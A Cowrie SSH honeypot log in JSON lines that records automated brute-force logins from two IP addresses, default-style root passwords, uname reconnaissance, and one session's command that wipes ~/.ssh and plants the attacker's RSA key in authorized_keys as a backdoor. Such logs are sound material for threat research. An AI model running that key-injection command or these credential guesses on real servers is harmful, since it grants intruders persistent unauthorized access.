{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:56:45.102182Z","src_ip":"212.227.235.229","session":"8b12eefebc1b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:56:45.405159Z","src_ip":"212.227.235.229","session":"8b12eefebc1b"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:45.473681Z","src_ip":"212.227.235.229","session":"8b12eefebc1b"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:45.474710Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34628,"dst_ip":"1.2.3.4","dst_port":22,"session":"f47d44da1a0a","protocol":"ssh","message":"New connection: 212.227.235.229:34628 (1.2.3.4:22) [session: f47d44da1a0a]","sensor":"my-vps","timestamp":"2025-08-31T00:56:48.201605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:56:48.209170Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:56:48.444873Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.login.success","username":"root","password":"Slave@123","message":"login attempt [root/Slave@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:56:49.401502Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:56:49.898539Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:56:49.899318Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:56:49.900495Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:50.144721Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:56:50.684819Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:56:50.685516Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48410,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ac67040e05d","protocol":"ssh","message":"New connection: 212.227.125.160:48410 (1.2.3.4:22) [session: 8ac67040e05d]","sensor":"my-vps","timestamp":"2025-08-31T00:56:50.886916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:56:50.887795Z","src_ip":"212.227.125.160","session":"8ac67040e05d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:56:50.926231Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:50.927186Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:56:50.961421Z","src_ip":"212.227.125.160","session":"8ac67040e05d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36056,"dst_ip":"1.2.3.4","dst_port":22,"session":"71d7126ff303","protocol":"ssh","message":"New connection: 212.227.235.229:36056 (1.2.3.4:22) [session: 71d7126ff303]","sensor":"my-vps","timestamp":"2025-08-31T00:56:51.152043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:56:51.155557Z","src_ip":"212.227.235.229","session":"71d7126ff303"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-31T00:56:51.184103Z","src_ip":"212.227.125.160","session":"8ac67040e05d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:56:51.388566Z","src_ip":"212.227.235.229","session":"71d7126ff303"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38190,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2ee1044f1bc","protocol":"ssh","message":"New connection: 212.227.125.160:38190 (1.2.3.4:22) [session: f2ee1044f1bc]","sensor":"my-vps","timestamp":"2025-08-31T00:56:52.227021Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:56:52.322637Z","src_ip":"212.227.235.229","session":"71d7126ff303"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:52.350087Z","src_ip":"212.227.125.160","session":"8ac67040e05d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:56:52.391812Z","src_ip":"212.227.125.160","session":"f2ee1044f1bc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:56:52.392733Z","src_ip":"212.227.125.160","session":"f2ee1044f1bc"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:53.558033Z","src_ip":"212.227.235.229","session":"71d7126ff303"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37374,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0462924f2f2","protocol":"ssh","message":"New connection: 212.227.235.229:37374 (1.2.3.4:22) [session: c0462924f2f2]","sensor":"my-vps","timestamp":"2025-08-31T00:56:53.788047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:56:53.792604Z","src_ip":"212.227.235.229","session":"c0462924f2f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:56:54.027977Z","src_ip":"212.227.235.229","session":"c0462924f2f2"}
{"eventid":"cowrie.login.failed","username":"debian","password":"12345","message":"login attempt [debian/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T00:56:54.077917Z","src_ip":"212.227.125.160","session":"f2ee1044f1bc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:56:54.968403Z","src_ip":"212.227.235.229","session":"c0462924f2f2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:55.200640Z","src_ip":"212.227.235.229","session":"c0462924f2f2"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:55.206394Z","src_ip":"212.227.235.229","session":"f47d44da1a0a"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:55.558211Z","src_ip":"212.227.125.160","session":"f2ee1044f1bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45304,"dst_ip":"1.2.3.4","dst_port":22,"session":"44f577a0b4dd","protocol":"ssh","message":"New connection: 212.227.125.160:45304 (1.2.3.4:22) [session: 44f577a0b4dd]","sensor":"my-vps","timestamp":"2025-08-31T00:57:01.274040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:57:01.275219Z","src_ip":"212.227.125.160","session":"44f577a0b4dd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:57:01.348244Z","src_ip":"212.227.125.160","session":"44f577a0b4dd"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:57:01.620082Z","src_ip":"212.227.125.160","session":"44f577a0b4dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:57:01.940755Z","src_ip":"212.227.125.160","session":"44f577a0b4dd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:57:01.941806Z","src_ip":"212.227.125.160","session":"44f577a0b4dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:02.016482Z","src_ip":"212.227.125.160","session":"44f577a0b4dd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:02.017649Z","src_ip":"212.227.125.160","session":"44f577a0b4dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52842,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba711bd1a699","protocol":"ssh","message":"New connection: 212.227.125.160:52842 (1.2.3.4:22) [session: ba711bd1a699]","sensor":"my-vps","timestamp":"2025-08-31T00:57:11.706915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:57:11.707895Z","src_ip":"212.227.125.160","session":"ba711bd1a699"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:57:11.781430Z","src_ip":"212.227.125.160","session":"ba711bd1a699"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:57:12.037044Z","src_ip":"212.227.125.160","session":"ba711bd1a699"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:57:12.347024Z","src_ip":"212.227.125.160","session":"ba711bd1a699"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:57:12.348027Z","src_ip":"212.227.125.160","session":"ba711bd1a699"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:12.423239Z","src_ip":"212.227.125.160","session":"ba711bd1a699"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:12.424681Z","src_ip":"212.227.125.160","session":"ba711bd1a699"}
